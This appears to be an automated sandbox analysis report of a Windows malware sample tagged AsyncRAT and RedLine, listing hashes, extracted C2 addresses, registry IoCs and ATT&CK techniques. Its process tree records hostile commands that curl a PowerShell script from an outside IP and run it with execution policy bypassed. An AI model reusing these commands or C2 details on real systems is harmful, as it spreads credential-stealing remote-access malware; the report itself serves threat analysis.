asyncrat | 55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

Analysis

max time kernel
139s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
15-12-2022 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

6KB
MD5

285cbd341de6e17b42f1663245a58346
SHA1

5281aa0f428bca4b5eeafda1b7eefc5735490d09
SHA256

55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c
SHA512

4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d
SSDEEP

96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Score

10^/10

asyncrat redline spoofer venom clients discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

SPOOFER

20.197.226.40:32619

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

20.197.226.40:4448

Mutex

CHECK_SYSTEMHOST

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4108-148-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2428 created 2452 2428 powershell.exe TrustedInstaller.exe

description	pid	process	target process
PID 2428 created 2452	2428	powershell.exe	TrustedInstaller.exe

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/5076-256-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

schtasks.exe

flow pid process

212 2868 schtasks.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exeUpdeter.exe

pid process

3980 Ynraflilhuhdhncsolreloader.exe
3536 Updeter.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4684 attrib.exe

flow	pid	process
212	2868	schtasks.exe

pid	process
3980	Ynraflilhuhdhncsolreloader.exe
3536	Updeter.exe

pid	process
4684	attrib.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeRegAsm.exeUpdeter.exetmp.exetmp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	Updeter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	tmp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exe

pid process

3980 Ynraflilhuhdhncsolreloader.exe
3980 Ynraflilhuhdhncsolreloader.exe

pid	process
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

tmp.exepowershell.exe

description	pid	process	target process
PID 4948 set thread context of 4108	4948	tmp.exe	tmp.exe
PID 3076 set thread context of 5076	3076	powershell.exe	RegAsm.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7b5d4ec4-b2f5-4f74-8c28-11fa2c2b6a12.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221215052721.pma	setup.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

3496 sc.exe
4864 sc.exe
2492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2868 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4776 timeout.exe

pid	process
3496	sc.exe
4864	sc.exe
2492	sc.exe

pid	process
2868	schtasks.exe

pid	process
4776	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies registry class 2 IoCs

Processes:

tmp.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Ynraflilhuhdhncsolreloader.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys	Ynraflilhuhdhncsolreloader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\8FB8456D512E1A183FE18B0BBCA2F9CD0672547B	Ynraflilhuhdhncsolreloader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\8FB8456D512E1A183FE18B0BBCA2F9CD0672547B\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000300036006500300033006500330031002d0037003400310066002d0034003700650036002d0061006100300036002d0064006400610036003200340063003800620064003400390000000000000000002300000000000000140000008fb8456d512e1a183fe18b0bbca2f9cd0672547b	Ynraflilhuhdhncsolreloader.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeYnraflilhuhdhncsolreloader.exe

pid	process
4220	powershell.exe
4220	powershell.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe
3980	Ynraflilhuhdhncsolreloader.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
1616 msedge.exe

pid	process
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

tmp.exepowershell.exetmp.exepowershell.exeRegAsm.exepowershell.exewhoami.exepowershell.exewhoami.exepowershell.exeschtasks.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4948	tmp.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4108	tmp.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	5076	RegAsm.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4772	whoami.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2896	whoami.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2868	schtasks.exe
Token: SeDebugPrivilege	2316	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

1616 msedge.exe
1616 msedge.exe
1616 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exe

pid process

3980 Ynraflilhuhdhncsolreloader.exe

pid	process
1616	msedge.exe
1616	msedge.exe
1616	msedge.exe

pid	process
3980	Ynraflilhuhdhncsolreloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exetmp.exeWScript.execmd.execmd.execmd.execmd.exepowershell.exemsedge.exe

description	pid	process	target process
PID 4948 wrote to memory of 4220	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 4220	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 4220	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 3980	4948	tmp.exe	Ynraflilhuhdhncsolreloader.exe
PID 4948 wrote to memory of 3980	4948	tmp.exe	Ynraflilhuhdhncsolreloader.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4108	4948	tmp.exe	tmp.exe
PID 4108 wrote to memory of 2200	4108	tmp.exe	WScript.exe
PID 4108 wrote to memory of 2200	4108	tmp.exe	WScript.exe
PID 4108 wrote to memory of 2200	4108	tmp.exe	WScript.exe
PID 2200 wrote to memory of 1036	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 1036	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 1036	2200	WScript.exe	cmd.exe
PID 1036 wrote to memory of 2736	1036	cmd.exe	cmd.exe
PID 1036 wrote to memory of 2736	1036	cmd.exe	cmd.exe
PID 1036 wrote to memory of 2736	1036	cmd.exe	cmd.exe
PID 2736 wrote to memory of 2060	2736	cmd.exe	curl.exe
PID 2736 wrote to memory of 2060	2736	cmd.exe	curl.exe
PID 2736 wrote to memory of 2060	2736	cmd.exe	curl.exe
PID 2200 wrote to memory of 2388	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2388	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2388	2200	WScript.exe	cmd.exe
PID 2388 wrote to memory of 3620	2388	cmd.exe	cmd.exe
PID 2388 wrote to memory of 3620	2388	cmd.exe	cmd.exe
PID 2388 wrote to memory of 3620	2388	cmd.exe	cmd.exe
PID 3620 wrote to memory of 3076	3620	cmd.exe	powershell.exe
PID 3620 wrote to memory of 3076	3620	cmd.exe	powershell.exe
PID 3620 wrote to memory of 3076	3620	cmd.exe	powershell.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 3076 wrote to memory of 5076	3076	powershell.exe	RegAsm.exe
PID 2200 wrote to memory of 1616	2200	WScript.exe	msedge.exe
PID 2200 wrote to memory of 1616	2200	WScript.exe	msedge.exe
PID 1616 wrote to memory of 4796	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 4796	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe
PID 1616 wrote to memory of 2784	1616	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4684 attrib.exe

pid	process
4684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
"C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3980

C:\Users\Admin\AppData\Local\Temp\tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmp.exe
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4108

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
5⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\SysWOW64\curl.exe
curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
6⤵
PID:2060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
5⤵
- Suspicious use of WriteProcessMemory
PID:3620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
6⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
